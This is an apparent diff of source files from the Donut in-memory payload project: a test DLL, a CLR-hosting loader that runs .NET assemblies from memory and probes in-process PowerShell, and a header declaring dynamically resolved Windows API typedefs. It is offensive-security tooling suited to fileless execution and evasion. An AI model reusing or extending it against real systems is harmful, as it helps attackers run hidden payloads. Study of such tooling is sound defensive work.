6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
+16
-0
payload/test/hello.cs less more
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9
10 // Keep the console window open in debug mode.
11 Console.WriteLine("Press any key to exit.");
12 Console.ReadKey();
13 }
14 }
15 }
+440
-0
payload/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
+414
-0
payload/winapi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 // imports from shlwapi.dll
57 typedef LSTATUS (WINAPI *SHGetValueA_t)(
58 HKEY hkey,
59 LPCSTR pszSubKey,
60 LPCSTR pszValue,
61 DWORD *pdwType,
62 void *pvData,
63 DWORD *pcbData);
64
65 // imports from mscoree.dll
66 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
67 REFCLSID clsid,
68 REFIID riid,
69 LPVOID *ppInterface);
70
71 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
72 LPCWSTR pwszVersion,
73 LPCWSTR pwszBuildFlavor,
74 REFCLSID rclsid,
75 REFIID riid,
76 LPVOID FAR *ppv);
77
78 // imports from ole32.dll
79 typedef HRESULT (WINAPI *CoInitializeEx_t)(
80 LPVOID pvReserved,
81 DWORD dwCoInit);
82
83 typedef void (WINAPI *CoUninitialize_t)(void);
84
85 typedef HRESULT (WINAPI *CoCreateInstance_t)(
86 REFCLSID rclsid,
87 LPUNKNOWN pUnkOuter,
88 DWORD dwClsContext,
89 REFIID riid,
90 LPVOID *ppv);
91
92 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
93 IUnknown *punkOuter,
94 void *pvThis,
95 ITypeInfo *ptinfo,
96 IUnknown **ppunkStdDisp);
97
98 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
99 ICreateErrorInfo **pperrinfo);
100
101 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
102 INTERFACEDATA *pidata,
103 LCID lcid,
104 ITypeInfo **pptinfo);
105
106 typedef HRESULT (WINAPI *GetErrorInfo_t)(
107 ULONG dwReserved,
108 IErrorInfo **pperrinfo);
109
110 typedef HRESULT (WINAPI *LoadTypeLib_t)(
111 LPCOLESTR szFile,
112 ITypeLib **pptlib);
113
114 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
115 LPCOLESTR szFile,
116 REGKIND regkind,
117 ITypeLib **pptlib);
118
119 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
120
121 // imports from oleaut32.dll
122 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
123 SAFEARRAY *psa,
124 UINT nDim,
125 LONG *plLbound);
126
127 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
128 SAFEARRAY *psa,
129 UINT nDim,
130 LONG *plUbound);
131
132 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
133 VARTYPE vt,
134 UINT cDims,
135 SAFEARRAYBOUND *rgsabound);
136
137 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
138 VARTYPE vt,
139 LONG lLbound,
140 ULONG cElements);
141
142 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
143 SAFEARRAY *psa,
144 LONG *rgIndices,
145 void *pv);
146
147 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
148 SAFEARRAY *psa);
149
150 typedef BSTR (WINAPI *SysAllocString_t)(
151 const OLECHAR *psz);
152
153 typedef void (WINAPI *SysFreeString_t)(
154 BSTR bstrString);
155
156 // imports from kernel32.dll
157 typedef HMODULE (WINAPI *LoadLibraryA_t)(
158 LPCSTR lpLibFileName);
159
160 typedef FARPROC (WINAPI *GetProcAddress_t)(
161 HMODULE hModule,
162 LPCSTR lpProcName);
163
164 typedef BOOL (WINAPI *AllocConsole_t)(void);
165
166 typedef BOOL (WINAPI *AttachConsole_t)(
167 DWORD dwProcessId);
168
169 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
170 PHANDLER_ROUTINE HandlerRoutine,
171 BOOL Add);
172
173 typedef HANDLE (WINAPI *GetStdHandle_t)(
174 DWORD nStdHandle);
175
176 typedef BOOL (WINAPI *SetStdHandle_t)(
177 DWORD nStdHandle,
178 HANDLE hHandle);
179
180 typedef HANDLE (WINAPI *CreateFileA_t)(
181 LPCSTR lpFileName,
182 DWORD dwDesiredAccess,
183 DWORD dwShareMode,
184 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
185 DWORD dwCreationDisposition,
186 DWORD dwFlagsAndAttributes,
187 HANDLE hTemplateFile);
188
189 typedef HANDLE (WINAPI *CreateEventA_t)(
190 LPSECURITY_ATTRIBUTES lpEventAttributes,
191 BOOL bManualReset,
192 BOOL bInitialState,
193 LPCSTR lpName);
194
195 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
196
197 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
198
199 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
200
201 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
202
203 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
204 int idHook,
205 HOOKPROC lpfn,
206 HINSTANCE hmod,
207 DWORD dwThreadId);
208
209 typedef BOOL (WINAPI *CreateProcessA_t)(
210 LPCSTR lpApplicationName,
211 LPSTR lpCommandLine,
212 LPSECURITY_ATTRIBUTES lpProcessAttributes,
213 LPSECURITY_ATTRIBUTES lpThreadAttributes,
214 BOOL bInheritHandles,
215 DWORD dwCreationFlags,
216 LPVOID lpEnvironment,
217 LPCSTR lpCurrentDirectory,
218 LPSTARTUPINFOA lpStartupInfo,
219 LPPROCESS_INFORMATION lpProcessInformation);
220
221 typedef DWORD (WINAPI *WaitForSingleObject_t)(
222 HANDLE hHandle,
223 DWORD dwMilliseconds);
224
225 // imports from wininet.dll
226 typedef BOOL (WINAPI *InternetCrackUrl_t)(
227 LPCSTR lpszUrl,
228 DWORD dwUrlLength,
229 DWORD dwFlags,
230 LPURL_COMPONENTS lpUrlComponents);
231
232 typedef HINTERNET (WINAPI *InternetOpen_t)(
233 LPCSTR lpszAgent,
234 DWORD dwAccessType,
235 LPCSTR lpszProxy,
236 LPCSTR lpszProxyBypass,
237 DWORD dwFlags);
238
239 typedef HINTERNET (WINAPI *InternetConnect_t)(
240 HINTERNET hInternet,
241 LPCSTR lpszServerName,
242 INTERNET_PORT nServerPort,
243 LPCSTR lpszUserName,
244 LPCSTR lpszPassword,
245 DWORD dwService,
246 DWORD dwFlags,
247 DWORD_PTR dwContext);
248
249 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
250 HINTERNET hConnect,
251 LPCSTR lpszVerb,
252 LPCSTR lpszObjectName,
253 LPCSTR lpszVersion,
254 LPCSTR lpszReferrer,
255 LPCSTR *lplpszAcceptTypes,
256 DWORD dwFlags,
257 DWORD_PTR dwContext);
258
259 typedef BOOL (WINAPI *InternetSetOption_t)(
260 HINTERNET hInternet,
261 DWORD dwOption,
262 LPVOID lpBuffer,
263 DWORD dwBufferLength);
264
265 typedef BOOL (WINAPI *HttpSendRequest_t)(
266 HINTERNET hRequest,
267 LPCSTR lpszHeaders,
268 DWORD dwHeadersLength,
269 LPVOID lpOptional,
270 DWORD dwOptionalLength);
271
272 typedef BOOL (WINAPI *HttpQueryInfo_t)(
273 HINTERNET hRequest,
274 DWORD dwInfoLevel,
275 LPVOID lpBuffer,
276 LPDWORD lpdwBufferLength,
277 LPDWORD lpdwIndex);
278
279 typedef BOOL (WINAPI *InternetReadFile_t)(
280 HINTERNET hFile,
281 LPVOID lpBuffer,
282 DWORD dwNumberOfBytesToRead,
283 LPDWORD lpdwNumberOfBytesRead);
284
285 typedef BOOL (WINAPI *InternetCloseHandle_t)(
286 HINTERNET hInternet);
287
288 typedef BOOL (WINAPI *CryptAcquireContext_t)(
289 HCRYPTPROV *phProv,
290 LPCSTR szContainer,
291 LPCSTR szProvider,
292 DWORD dwProvType,
293 DWORD dwFlags);
294
295 typedef void (WINAPI *GetSystemInfo_t)(
296 LPSYSTEM_INFO lpSystemInfo);
297
298 typedef SIZE_T (WINAPI *VirtualQuery_t)(
299 LPCVOID lpAddress,
300 PMEMORY_BASIC_INFORMATION lpBuffer,
301 SIZE_T dwLength);
302
303 typedef BOOL (WINAPI *VirtualProtect_t)(
304 LPVOID lpAddress,
305 SIZE_T dwSize,
306 DWORD flNewProtect,
307 PDWORD lpflOldProtect);
308
309 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
310 LPCSTR lpModuleName);
311
312 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
313 LPCSTR lpLibFileName,
314 HANDLE hFile,
315 DWORD dwFlags);
316
317 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
318 LPCWSTR lpLibFileName,
319 HANDLE hFile,
320 DWORD dwFlags);
321
322 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
323 LPCSTR pszString,
324 DWORD cchString,
325 DWORD dwFlags,
326 BYTE *pbBinary,
327 DWORD *pcbBinary,
328 DWORD *pdwSkip,
329 DWORD *pdwFlags);
330
331 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
332 DWORD dwCertEncodingType,
333 LPCSTR lpszStructType,
334 const BYTE *pbEncoded,
335 DWORD cbEncoded,
336 DWORD dwFlags,
337 PCRYPT_DECODE_PARA pDecodePara,
338 void *pvStructInfo,
339 DWORD *pcbStructInfo);
340
341 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
342 HCRYPTPROV hCryptProv,
343 DWORD dwCertEncodingType,
344 PCERT_PUBLIC_KEY_INFO pInfo,
345 HCRYPTKEY *phKey);
346
347 typedef BOOL (WINAPI *CryptCreateHash_t)(
348 HCRYPTPROV hProv,
349 ALG_ID Algid,
350 HCRYPTKEY hKey,
351 DWORD dwFlags,
352 HCRYPTHASH *phHash);
353
354 typedef BOOL (WINAPI *CryptHashData_t)(
355 HCRYPTHASH hHash,
356 const BYTE *pbData,
357 DWORD dwDataLen,
358 DWORD dwFlags);
359
360 typedef BOOL (WINAPI *CryptVerifySignature_t)(
361 HCRYPTHASH hHash,
362 const BYTE *pbSignature,
363 DWORD dwSigLen,
364 HCRYPTKEY hPubKey,
365 LPCSTR szDescription,
366 DWORD dwFlags);
367
368 typedef BOOL (WINAPI *CryptDestroyHash_t)(
369 HCRYPTHASH hHash);
370
371 typedef BOOL (WINAPI *CryptDestroyKey_t)(
372 HCRYPTKEY hKey);
373
374 typedef BOOL (WINAPI *CryptReleaseContext_t)(
375 HCRYPTPROV hProv,
376 DWORD dwFlags);
377
378 typedef LPVOID (WINAPI *VirtualAlloc_t)(
379 LPVOID lpAddress,
380 SIZE_T dwSize,
381 DWORD flAllocationType,
382 DWORD flProtect);
383
384 typedef BOOL (WINAPI *VirtualFree_t)(
385 LPVOID lpAddress,
386 SIZE_T dwSize,
387 DWORD dwFreeType);
388
389 typedef HLOCAL (WINAPI *LocalFree_t)(
390 HLOCAL hMem);
391
392 typedef HRSRC (WINAPI *FindResource_t)(
393 HMODULE hModule,
394 LPCSTR lpName,
395 LPCSTR lpType);
396
397 typedef HGLOBAL (WINAPI *LoadResource_t)(
398 HMODULE hModule,
399 HRSRC hResInfo);
400
401 typedef LPVOID (WINAPI *LockResource_t)(
402 HGLOBAL hResData);
403
404 typedef DWORD (WINAPI *SizeofResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef void (WINAPI *RtlZeroMemory_t)(
409 LPVOID Destination,
410 SIZE_T Length);
411 #endif
412
413
+341
-0
payload/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
